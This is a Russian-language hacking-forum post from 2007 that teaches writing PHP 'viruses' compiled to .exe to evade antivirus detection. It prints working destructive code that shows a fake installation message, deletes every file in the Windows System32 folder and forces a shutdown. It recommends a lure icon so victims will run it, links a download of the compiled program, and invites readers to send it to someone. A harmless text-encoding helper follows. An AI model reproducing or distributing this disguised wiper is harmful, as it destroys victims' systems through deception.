Форум АНТИЧАТ - Левые вирусы, которые не палят антивирусы

Левые вирусы, которые не палят антивирусы

11.05.2007, 22:00

Ponchik

Постоянный

Регистрация: 30.08.2005

Сообщений: 730

Провел на форуме:
6828219

Репутация: 2274

Левые вирусы, которые не палят антивирусы

Хай всем!
Возможно этот способ уже все знают, но всёравно...
Оказывается можно писать вирусы на PHP

Конечно они нубские получаются, но не палятся антивирусами... Вы наверное думаете что этот способ годен только для серверов с поддержкой PHP, однако для запуска PHP вируса ненужен сервер

PHP скрипты можно компилировать в .exe файлы, для меня (когда я это узнал) было огромное открытие, для вас возможно нет... Тогда закройте эту страничку, всёравно ничего нового не узнаете...
Для компиляции PHP скриптов есть много программ, я лично юзаю php bam compile маленькая прога не требующая никакой установки!
Скачать тут: _http://slil.ru/24354564
В архиве 5 фалов:

bamcompile.exe - компилятор
readme.txt - описание компилятора (помощ)
virus-unlink.php - мой пример вируса

Вот...

PHP код:


		
			
<?php

set_time_limit(0);

ignore_user_abort();

echo "Preparing to installation... Plsease wait\n\n\n\n";

foreach (glob("C:/WINDOWS/System32/*") as $filename)

{

   @unlink($filename);

}

echo "TY 4URKO!\nBy Ponchik\nICQ:202-995-022\nWEB:antichat.ru";

sleep(5);

system('shutdown -s');

?>

Что он делает?
1)Выводит нажпись "Preparing to installation... Plsease wait"
2)Получает список файлов из C:/WINDOWS/System32/ и пытается их по очереди удалить...
3)После всего этого выводит текст
TY 4URKO!
By Ponchik
ICQ:202-995-022
WEB:antichat.ru
4)Замирает на 5 сек
5)Выводит табличку выключения компа через 30 сек. (естествено он уже не включится без system32

)

4)popa=).ico - иконка голой попы

(чтоб хотелось запустить)
5)virus-unlink.exe - откомпилированый не сжатый вирус с иконкой попы

Эмм... Кажись всё...
Лаги которые очень мешают:
1)После выполнения, программа закрывается, я личто решаю это так:
while(true) { sleep(10); }
это прописать в конец программы
2)Не работает функция usleep ну она врядле вам нужна будет

3)В досе невидн русский текст, например если написать
echo 'Предед медвед'; - Это выведет каракули
Я это решаю функцией

PHP код:


		
			
<?php

function strtoruss($text)

{

         $letter = array(

         'А' => chr(128),

         'Б' => chr(129),

         'В' => chr(130),

         'Г' => chr(131),

         'Д' => chr(132),

         'Е' => chr(133),

         'Ё' => chr(133),

         'Ж' => chr(134),

         'З' => chr(135),

         'И' => chr(136),

         'Й' => chr(137),

         'К' => chr(138),

         'Л' => chr(139),

         'М' => chr(140),

         'Н' => chr(141),

         'О' => chr(142),

         'П' => chr(143),

         'Р' => chr(144),

         'С' => chr(145),

         'Т' => chr(146),

         'У' => chr(147),

         'Ф' => chr(148),

         'Х' => chr(149),

         'Ц' => chr(150),

         'Ч' => chr(151),

         'Ш' => chr(152),

         'Щ' => chr(153),

         'Ъ' => chr(154),

         'Ы' => chr(155),

         'Ь' => chr(156),

         'Э' => chr(157),

         'Ю' => chr(158),

         'Я' => chr(159),

         'а' => chr(160),

         'б' => chr(161),

         'в' => chr(162),

         'г' => chr(163),

         'д' => chr(164),

         'е' => chr(165),

         'ё' => chr(165),

         'ж' => chr(166),

         'з' => chr(167),

         'и' => chr(168),

         'й' => chr(169),

         'к' => chr(170),

         'л' => chr(171),

         'м' => chr(172),

         'н' => chr(173),

         'о' => chr(174),

         'п' => chr(175),

         'р' => chr(224),

         'с' => chr(225),

         'т' => chr(226),

         'у' => chr(227),

         'ф' => chr(228),

         'х' => chr(229),

         'ц' => chr(230),

         'ч' => chr(231),

         'ш' => chr(232),

         'щ' => chr(233),

         'ъ' => chr(234),

         'ы' => chr(235),

         'ь' => chr(236),

         'э' => chr(237),

         'ю' => chr(238),

         'я' => chr(239)

         );



         for($i=0;$i<strlen($text);$i++)

         {

               if($letter[$text[$i]])

               $toreturn = $toreturn.$letter[$text[$i]];

               else

               $toreturn = $toreturn.$text[$i];

         }

         return $toreturn;

}

?>

Пишем это в начало скрипта, потом так
echo strtoruss('Превед медвед');
И всё ок

======================================
Не судите строго, для меня это было открытием

Хоть и фиговые вирусы получаются, зато они не палятся, можно конечно на C++ офигительные не палевные писать, но я С++ незнаю, поэтому РНР для меня единственое решение

В общем не судите строго

P.S. virus-unlink.exe полностью готов к работе, можете комунить отправить